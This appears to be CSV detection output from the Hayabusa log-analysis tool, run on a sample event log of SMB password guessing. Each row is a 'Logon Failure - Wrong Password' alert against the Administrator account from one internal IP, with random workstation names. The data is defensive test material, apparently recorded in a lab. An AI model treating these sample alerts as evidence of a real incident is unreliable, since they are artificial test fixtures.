2016-09-20 01:51:57.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rHjqFQwqpCJFI6qP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.139 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: L5pEWq2mYsFpFLbb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HSFKJXTC2wlyw0gu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vh5igCJpAA5rmqzV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5NzLlJWkfXDcm64c  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: i9sR1QHgZ4oaa82F  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Pq1GWcKzSHSP28hk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: agCtM0s62zXPop0y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.430 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dVvglj7RtxrBUeXi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pMbS0sIpbFDqJvMW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ldO0cAZ54BRHHDyz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OmJH2QWFPiYarKh5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5fCiyHtI0OTo8pBO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: e3vkVuU43tsYHUSj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.714 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3w21sFOu2u7FTDZM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Bk7eaqQNK1CEgqoj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Rv5joLgkm3QUYPyb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4l15usDM7jggwEyw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: p9QpOvgDmiOgzQqb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Dqyr8tb9TrO1aJNe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hI1bzjixP8eOdDbw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pMTAp20wXS3d1OCk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qrQGfxInmlgPqGtd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZcsMMQbsnUdyLJWi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8oRYZqBBsq9GyApI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0TAhib6p8fY5iOgI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FerGHj9abOe6ehZn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.362 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kN4B4KLpXbyKZzGv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HJtoyRfP38T3KToO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rkI5hLApUWhGnKIs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZCPSO4JLjMur2Eow  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VHmrv2xFuq7TyIQN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8SqYq3msNfFh24lg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YE0a2Bypzc1MMdGn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ojgIg88VK6hB72PI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ehLrf2GoAhY3Rf7Y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ccfgpjwpis15B4gY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vysSf3DsOxQf5fVd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IEp88cEeiNw4IQsm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5PXDJPzw0gPdlCiH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Mwoe9IgWx2UZ7Iuu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3eW0nFDUwKFzoQIw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: q0i0p5QxJ4ykYYJt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VsxqWAnd6j2CdyB3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: y5qdy80mtFWl199k  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ce0d84uBK4t2sqR3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b4dZYZEW1VijjwHN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZmqGJWbeap5dv0gC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zaNUqChgVSbDkFQu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.319 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: B4PDZ55it0V4QGnM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TQxXVB8Aj5gaw2f2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vzDeZtgSJoH74GYk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iNAFsZraFvw67WWR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0aVdnbyzWqk58rOW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WjUH2PopXCrrPzqi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ylmV2z3WjTWsTpyu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.654 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8qBKZTYRTKuEAgS8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JvekO4A5f6QK2ynZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LDUqydSeA1guOjIP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: o71TltsJDyOIuLQb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NXT3MSCes42dVCNn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FGXiWeT8Evr6G70M  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V2RarzrnGgcLaseH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: u3k7dXu9o1vMkhby  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EDBt76dmYnPstFWw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4yjzMC7cw0fe7gjS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eQOWCM7KP68DZTX9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kn9WWWqCIwfrPbie  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AQcamLSzsXOjP6FL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.278 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6R6ZMRoYkAPB35Bq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ubqnZm0jmHNFCHrM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7ORQ8vL1oo6CkJXK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
